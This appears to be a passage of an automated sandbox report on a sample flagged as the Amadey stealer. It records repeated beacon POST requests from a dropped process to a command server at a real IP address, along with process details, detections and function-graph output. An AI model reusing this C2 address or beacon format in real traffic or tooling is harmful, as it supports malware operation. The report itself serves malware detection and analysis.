                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:54.371426105 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.44978577.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:54.489471912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:55.180836916 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:55.183578968 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:55.399924994 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.44978677.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:55.523468971 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:56.233320951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:56.235898972 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:56.455529928 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.44978777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:56.566483021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:57.286765099 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:57.287595987 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:57.512305021 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.44978877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:57.628817081 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:58.319137096 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:23:08:52
                    Start date:04/07/2024
                    Path:C:\Users\user\Desktop\gNo9ad9KO4.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\gNo9ad9KO4.exe"
                    Imagebase:0x160000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:1
                    Start time:23:08:54
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 51%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:23:08:56
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:7
                    Start time:23:10:00
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Imagebase:0xe90000
                    File size:1'894'912 bytes
                    MD5 hash:C2197D56F08530AF4A35733CDA8CD2FD
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 05490C90 Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9cced7a580dc0341a781b952bf1253ab402c17ef8871bc364165c6b9f1d9d0ac
                      • Instruction ID: 2260a2142df72f109b7243cb81078226ab9fca9ddc7c7da6f7f14a60a80eaadf
                      • Opcode Fuzzy Hash: 9cced7a580dc0341a781b952bf1253ab402c17ef8871bc364165c6b9f1d9d0ac
                      • Instruction Fuzzy Hash: 8D01D6EF18C125BE695EC5411B1E9F63E3FE5D27303318227F80FDA602E2A45A5B51B2
                      Function 05490CA7 Relevance: .1, Instructions: 83COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6c2d3ae1bf200e20433ecfb9d60f8545a3e0c1eefff62b2432d78bb62531c42
                      • Instruction ID: da790b58e6c19d9af5997b0ded2cd58cf0931bcbf0decab1f6f8fdd98a43dec4
                      • Opcode Fuzzy Hash: c6c2d3ae1bf200e20433ecfb9d60f8545a3e0c1eefff62b2432d78bb62531c42
                      • Instruction Fuzzy Hash: 2601DBEF18C125BD695AC5411B1EAF73E3FE5D27303318127F80FDA602E2945A5B51B2
                      Function 05490CBF Relevance: .1, Instructions: 73COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0924ccff450dde87af869237511402858e010289af5f69bdc82bb539afc2ce62
                      • Instruction ID: 9c20d8849399a6da25daf4cd30632ce716dacd46634a449e26d421337ce06fc4
                      • Opcode Fuzzy Hash: 0924ccff450dde87af869237511402858e010289af5f69bdc82bb539afc2ce62
                      • Instruction Fuzzy Hash: 0301D2AF18C011BD695DC5401B1EAF63F3FE4D27303308627F80BD9502D2A45A5B9171
                      Function 05490CD0 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3c71b8fde6457f864f52e21961d1b2db7de2f96db37835d5c33339912d031
                      • Instruction ID: a032131e2338f296ea2effb0a583846211973a0ff6c85a6e2043cec98dec3ad2
                      • Opcode Fuzzy Hash: a3d3c71b8fde6457f864f52e21961d1b2db7de2f96db37835d5c33339912d031
                      • Instruction Fuzzy Hash: EC01F2AF08D015BE295AD6402B1EAFA3F3FF4D27303308223F80BD9502D2A45A5B5172
                      Function 05490D41 Relevance: .1, Instructions: 65COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd6b8be51fdc73d2a4a141b0b175da7fc4e2cafea406f9099eea5848ff711e64
                      • Instruction ID: 535dc4e6fccc58c0e94cbd0d09c3bd7eff15a0a537a4e1f4123d6200fe638ea6
                      • Opcode Fuzzy Hash: dd6b8be51fdc73d2a4a141b0b175da7fc4e2cafea406f9099eea5848ff711e64
                      • Instruction Fuzzy Hash: 7501A2BF08D015ED695EC6442A1EAFA3F2FF5C57303308627F80FC5502E2955A9B5171
                      Function 05490D0F Relevance: .1, Instructions: 64COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5aff2a3cb98312462d3b13d8edf10c132bfc3f8da66aaada0d8b7b9c3b66d7c1
                      • Instruction ID: cf727b8dc5db79ae635b623edfabddeef636c14585e869b655b3e904142164d3
                      • Opcode Fuzzy Hash: 5aff2a3cb98312462d3b13d8edf10c132bfc3f8da66aaada0d8b7b9c3b66d7c1
                      • Instruction Fuzzy Hash: 740126AF08C010ADAA19C6502A0EAF73F3FE4D67303318757F41BC9642E2985A5B9171
                      Function 05490D5A Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b46142410ee08eb60276c1641b83db47f3694687e96ff5243f36fdb195548a87
                      • Instruction ID: 2fd84706991d074fd799f75864e06a0d296b90208eeee5ef745634f8877d4c14
                      • Opcode Fuzzy Hash: b46142410ee08eb60276c1641b83db47f3694687e96ff5243f36fdb195548a87
                      • Instruction Fuzzy Hash: 0CF028DF08D010AD7A09D5512B1D9F73F3FE0D2B30331865BF44BC4102E1505A8B5131
                      Function 05490CED Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 21dad92ddd312c7e5a3e9a087b229951aab9a15275e1aa8e4ec3882a4a5e6af6
                      • Instruction ID: 6b3938068f63f2b3bb03f62af123159b60366dc260713820474a18daa80dc8f3
                      • Opcode Fuzzy Hash: 21dad92ddd312c7e5a3e9a087b229951aab9a15275e1aa8e4ec3882a4a5e6af6
                      • Instruction Fuzzy Hash: 18F0D1BF04D011FDAA59C6446A1EAF67F2FF5D27303308627F40BC4502D2A4665B9132
                      Function 05490D2D Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b632cb8f626b102bf95247398c6dbd9e1ffab16fe6290e20dc1268908af7bf23
                      • Instruction ID: 18bfab58d3419821e79afd4d28bf554efee6916cfc228a5d8396cef6b96ed325
                      • Opcode Fuzzy Hash: b632cb8f626b102bf95247398c6dbd9e1ffab16fe6290e20dc1268908af7bf23
                      • Instruction Fuzzy Hash: 6BF05EAF18D011AD7A58D5912B1EAF77F2FF4D2B303318627F80BC8502E5949A8B5071
                      Function 05490D70 Relevance: .0, Instructions: 48COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e885f8075cab8835d36c2b8a2c74df175c8af39e6ba9836dd01c4172b1e728e4
                      • Instruction ID: 365059be26b23121632cbf290d9ed3fc9ee0eb0d25351ae65f1661dbe078e258
                      • Opcode Fuzzy Hash: e885f8075cab8835d36c2b8a2c74df175c8af39e6ba9836dd01c4172b1e728e4
                      • Instruction Fuzzy Hash: B6F027EF08D020AC7446C6912B0E9FA3F6EF0D2B31330CA6BF446D4482D1594B8F8131
                      Function 05490D93 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 04277db9b854fd47d529742e0bd39dd7536caca9b07deb51f021e58e0006a082
                      • Instruction ID: 5e7f82f26e7aa7d450ae6f0ff52b6d28daa408400564a9a05d6a9b16c7c178df
                      • Opcode Fuzzy Hash: 04277db9b854fd47d529742e0bd39dd7536caca9b07deb51f021e58e0006a082
                      • Instruction Fuzzy Hash: 5BE046AF18C014AC7586C2913A2DAF66F3EF0C2B303308467F486D0902E1884A5F6130
                      Function 05490DA8 Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1682298985.0000000005490000.00000040.00001000.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5490000_gNo9ad9KO4.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfbb4cfed7400e05eae1408283c0852563247c7a21738ef12d8937be05dafb98
                      • Instruction ID: 9b546864e5d0e833f02622533ce7690991baf0ab963a6c50cbc6a8b88fad7ac5
                      • Opcode Fuzzy Hash: dfbb4cfed7400e05eae1408283c0852563247c7a21738ef12d8937be05dafb98
                      • Instruction Fuzzy Hash: 69E072BF58C210EEA244E2A1220C1F6BBBBF5C1B30330803FF046C0802E6881A8FA170

                      Execution Graph

                      Execution Coverage:6.4%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:8.1%
                      Total number of Nodes:595
                      Total number of Limit Nodes:28
                      execution_graph 15045 eab82e 15050 eab6b5 15045->15050 15047 eab856 15058 eab618 15047->15058 15049 eab86f 15051 eab6c1 Concurrency::details::_Reschedule_chore 15050->15051 15052 eab6f2 15051->15052 15068 eac5af 15051->15068 15052->15047 15056 eab6dc __Mtx_unlock 15057 e92a10 7 API calls 15056->15057 15057->15052 15059 eab624 Concurrency::details::_Reschedule_chore 15058->15059 15060 eac5af GetSystemTimePreciseAsFileTime 15059->15060 15061 eab67e 15059->15061 15062 eab639 15060->15062 15061->15049 15063 e92a10 7 API calls 15062->15063 15064 eab63f __Mtx_unlock 15063->15064 15065 e92a10 7 API calls 15064->15065 15066 eab65c __Cnd_broadcast 15065->15066 15066->15061 15067 e92a10 7 API calls 15066->15067 15067->15061 15076 eac355 15068->15076 15070 eab6d6 15071 e92a10 15070->15071 15072 e92a1a 15071->15072 15073 e92a1c 15071->15073 15072->15056 15093 eac16d 15073->15093 15077 eac3ab 15076->15077 15079 eac37d 15076->15079 15077->15079 15082 eace6e 15077->15082 15079->15070 15080 eac400 __Xtime_diff_to_millis2 15080->15079 15081 eace6e _xtime_get GetSystemTimePreciseAsFileTime 15080->15081 15081->15080 15083 eace7d 15082->15083 15085 eace8a __aulldvrm 15082->15085 15083->15085 15086 eace47 15083->15086 15085->15080 15089 eacaed 15086->15089 15090 eacb0a 15089->15090 15091 eacafe GetSystemTimePreciseAsFileTime 15089->15091 15090->15085 15091->15090 15094 eac195 15093->15094 15095 eac177 15093->15095 15094->15094 15095->15094 15097 eac19a 15095->15097 15098 e929e0 7 API calls 15097->15098 15099 eac1b1 std::_Xinvalid_argument 15098->15099 15099->15095 14519 ec6bcb 14520 ec6bd7 14519->14520 14531 ec8a8f 14520->14531 14522 ec6c06 14523 ec6c15 14522->14523 14524 ec6c23 14522->14524 14525 ec6c79 6 API calls 14523->14525 14537 ec689d 14524->14537 14527 ec6c1f 14525->14527 14528 ec6c3d 14530 ec6c51 ___free_lconv_mon 14528->14530 14540 ec6c79 14528->14540 14532 ec8a94 __fassign 14531->14532 14535 ec8a9f 14532->14535 14552 ecd4d4 14532->14552 14549 ec64fd 14535->14549 14536 ec8ad2 __dosmaperr __fassign 14536->14522 14569 ec681a 14537->14569 14539 ec68af 14539->14528 14541 ec6ca4 __cftof 14540->14541 14548 ec6c87 __cftof __dosmaperr 14540->14548 14542 ec6ce6 CreateFileW 14541->14542 14547 ec6cca __cftof __dosmaperr 14541->14547 14543 ec6d18 14542->14543 14544 ec6d0a 14542->14544 14617 ec6d57 14543->14617 14605 ec6de1 GetFileType 14544->14605 14547->14530 14548->14530 14557 ec63d7 14549->14557 14553 ecd4e0 __fassign 14552->14553 14554 ecd53c __cftof __dosmaperr __fassign 14553->14554 14555 ec64fd __fassign 2 API calls 14553->14555 14554->14535 14556 ecd6ce __dosmaperr __fassign 14555->14556 14556->14535 14560 ec63e5 __fassign 14557->14560 14558 ec6430 14558->14536 14560->14558 14562 ec643b 14560->14562 14567 eca1a2 GetPEB 14562->14567 14564 ec6445 14565 ec644a GetPEB 14564->14565 14566 ec645a __fassign 14564->14566 14565->14566 14568 eca1bc __fassign 14567->14568 14568->14564 14570 ec683a 14569->14570 14574 ec6831 14569->14574 14570->14574 14575 ecb49b 14570->14575 14574->14539 14576 ecb4ae 14575->14576 14577 ec6870 14575->14577 14576->14577 14583 ecf44b 14576->14583 14579 ecb4c8 14577->14579 14580 ecb4db 14579->14580 14581 ecb4f0 14579->14581 14580->14581 14588 ece551 14580->14588 14581->14574 14585 ecf457 __fassign 14583->14585 14584 ecf4a6 14584->14577 14585->14584 14586 ec8a8f __fassign 2 API calls 14585->14586 14587 ecf4cb 14586->14587 14589 ece55b 14588->14589 14592 ece469 14589->14592 14591 ece561 14591->14581 14593 ece475 __fassign ___free_lconv_mon 14592->14593 14594 ece496 14593->14594 14595 ec8a8f __fassign 2 API calls 14593->14595 14594->14591 14596 ece508 14595->14596 14597 ece544 14596->14597 14601 eca5ce 14596->14601 14597->14591 14602 eca5f1 14601->14602 14603 ec8a8f __fassign 2 API calls 14602->14603 14604 eca667 14603->14604 14606 ec6e1c __cftof 14605->14606 14610 ec6eb2 __dosmaperr 14605->14610 14607 ec6e55 GetFileInformationByHandle 14606->14607 14606->14610 14608 ec6e6b 14607->14608 14607->14610 14622 ec70a9 14608->14622 14610->14547 14613 ec6e88 14614 ec6f51 SystemTimeToTzSpecificLocalTime 14613->14614 14615 ec6e9b 14614->14615 14616 ec6f51 SystemTimeToTzSpecificLocalTime 14615->14616 14616->14610 14618 ec6d65 14617->14618 14619 ec6d6a __dosmaperr 14618->14619 14620 ec70a9 2 API calls 14618->14620 14619->14547 14621 ec6d83 14620->14621 14621->14547 14623 ec70bf _wcsrchr 14622->14623 14626 ec6e77 14623->14626 14636 ecb9c4 14623->14636 14625 ec7103 14625->14626 14627 ecb9c4 2 API calls 14625->14627 14632 ec6f51 14626->14632 14628 ec7114 14627->14628 14628->14626 14629 ecb9c4 2 API calls 14628->14629 14630 ec7125 14629->14630 14630->14626 14631 ecb9c4 2 API calls 14630->14631 14631->14626 14633 ec6f69 14632->14633 14634 ec6f89 SystemTimeToTzSpecificLocalTime 14633->14634 14635 ec6f6f 14633->14635 14634->14635 14635->14613 14638 ecb9d2 14636->14638 14640 ecb9d8 __cftof __dosmaperr 14638->14640 14641 ecba0d 14638->14641 14639 ecba08 14639->14625 14640->14625 14642 ecba1d __cftof __dosmaperr 14641->14642 14643 ecba37 14641->14643 14642->14639 14643->14642 14644 ec681a __fassign 2 API calls 14643->14644 